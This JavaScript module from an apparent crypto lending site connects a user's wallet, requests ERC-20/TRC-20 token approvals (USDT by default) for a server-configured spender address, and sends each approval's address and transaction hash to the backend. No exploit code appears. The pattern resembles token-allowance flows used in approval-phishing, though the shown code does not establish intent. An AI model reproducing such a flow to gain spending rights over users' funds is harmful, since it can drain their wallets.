import { WalletUtils } from '@/api/wallet/walletUtils'
import { saveWalletAuth } from '@/api/wallet'
import {
	showWalletAuthLoading,
	hideWalletAuthLoading
} from '@/utils/walletAuthLoading'
import { isWalletUserRejected } from '@/utils/walletErrors'

const WALLET_ERROR_I18N_KEYS = [
	'walletUserRejected',
	'walletContractRejectAuth',
	'walletNetworkTimeout',
	'walletInsufficientBalance',
	'walletInsufficientGas',
	'walletContractFailed',
	'walletTransactionFailed',
	'walletConfigFailed',
	'walletConfigEmpty',
	'walletContractCallFailed',
	'walletApproveResult',
	'walletAlreadyApproved',
	'walletTronUsdtOnly',
	'walletTronContractMissing'
]

const MESSAGE_I18N_KEY_MAP = [
	['Please Switch to Ethereum Mainnet to Continue.', 'wallet.noWalletDetected'],
	['MetaMask not detected', 'wallet.noWalletDetected'],
	['Ethereum wallet not detected', 'wallet.noWalletDetected'],
	['TronLink not detected', 'wallet.noWalletDetected'],
	['TronLink not logged in', 'wallet.tronNotReady'],
	['TronWeb initialization timeout', 'wallet.tronNotReady'],
	['No accounts found', 'wallet.connectFailed'],
	['Unsupported wallet type', 'wallet.connectFailed'],
	['Wallet not connected', 'wallet.pleaseConnectWallet'],
	['Wallet config not loaded', 'walletConfigFailed'],
	['Smart contract configuration not loaded', 'walletConfigFailed'],
	['Spender address not specified and target address not configured', 'walletConfigFailed'],
	['ERC20 ABI not loaded', 'walletConfigFailed'],
	['Network ', 'wallet.networkNotSupported'],
	['Smart contract not configured for network:', 'wallet.networkNotSupported'],
	['Token ', 'wallet.authFailed']
]

function createAuthorizeError(i18nKey) {
	const error = new Error(i18nKey)
	error.i18nKey = i18nKey
	return error
}

function extractTxHash(result) {
	if (!result) return 'wallet_authorized'
	if (typeof result === 'string') return result
	return result.transactionHash || result.txHash || 'wallet_authorized'
}

function isAuthOk(response) {
	return !!(response && (response.code === '200' || response.code === 200))
}

export function requireLogin(vm) {
	if (!vm.$store.state.isLogin) {
		vm.$message.warning(vm.$t('lendingIdentity.needLogin'))
		vm.$router.push('/pass/login').catch(() => {})
		return false
	}
	return true
}

export function isAuthorizeUserRejectedError(vm, error) {
	if (isWalletUserRejected(error)) return true
	if (!error || !vm) return false
	const msg = String(error.message || '')
	return msg === vm.$t('walletUserRejected') || msg === vm.$t('wallet.userCancelledAuth')
}

export function resolveAuthorizeErrorMessage(vm, error) {
	if (!error) return vm.$t('wallet.authFailed')

	if (error.i18nKey) {
		return vm.$t(error.i18nKey)
	}

	if (error.message === 'login_expired') {
		return vm.$t('20103')
	}

	if (isAuthorizeUserRejectedError(vm, error)) {
		return vm.$t('wallet.userCancelledAuth')
	}

	const msg = String(error.message || '')

	for (const key of WALLET_ERROR_I18N_KEYS) {
		if (msg === vm.$t(key)) {
			return msg
		}
	}

	for (const [pattern, i18nKey] of MESSAGE_I18N_KEY_MAP) {
		if (msg === pattern || msg.includes(pattern)) {
			return vm.$t(i18nKey)
		}
	}

	return vm.$t('wallet.authFailed')
}

/**
 * 连接钱包 → 授权代币 → 保存授权。登录页走签名，不走这里。
 */
export async function authorizeWallet(vm, options = {}) {
	const walletUtils = options.walletUtils || new WalletUtils()
	showWalletAuthLoading()
	try {
		const walletInfo = await walletUtils.connectWallet({
			chain: options.chain,
			pickChain: options.pickChain
		})
		const tokenKeys = (options.symbols && options.symbols.length)
			? options.symbols.map((symbol) => String(symbol).toLowerCase())
			: walletUtils.getApproveTokenSymbols()

		const authEntries = []
		for (const key of tokenKeys) {
			const result = await walletUtils.approveToken(key)
			authEntries.push({
				tokenType: key.toUpperCase(),
				txHash: extractTxHash(result)
			})
		}
		if (authEntries.length === 0) {
			authEntries.push({ tokenType: 'USDT', txHash: 'wallet_authorized' })
		}

		const baseSaveData = {
			address: walletInfo.address,
			walletType: walletInfo.walletType,
			networkType: walletInfo.networkType
		}

		let response = null
		for (const entry of authEntries) {
			response = await saveWalletAuth({ ...baseSaveData, ...entry })
			if (!isAuthOk(response)) break
		}

		if (!isAuthOk(response)) {
			if (response && response.code === 401) {
				throw createAuthorizeError('20103')
			}
			throw createAuthorizeError('wallet.authFailed')
		}

		hideWalletAuthLoading()
		if (Object.prototype.hasOwnProperty.call(vm, 'isWalletAuthorized')) {
			vm.isWalletAuthorized = true
		}
		vm.$message.success(vm.$t('wallet.authSuccess'))
		await vm.$store.dispatch('GET_USER_INFO')
		await vm.$store.dispatch('FETCH_WALLET_AUTH_STATUS')
		if (typeof vm.refreshAll === 'function') {
			await vm.refreshAll()
		}
		return { walletUtils, walletInfo, response }
	} catch (error) {
		hideWalletAuthLoading()
		throw error
	}
}

export async function authorizeLendingAsset(vm, symbol = 'USDT', options = {}) {
	return authorizeWallet(vm, { ...options, symbols: [symbol] })
}

export function handleAuthorizeError(vm, e) {
	console.error('钱包授权失败:', e)
	const message = resolveAuthorizeErrorMessage(vm, e)
	if (isAuthorizeUserRejectedError(vm, e)) {
		vm.$message.warning(message)
		return
	}
	vm.$message.error(message)
}
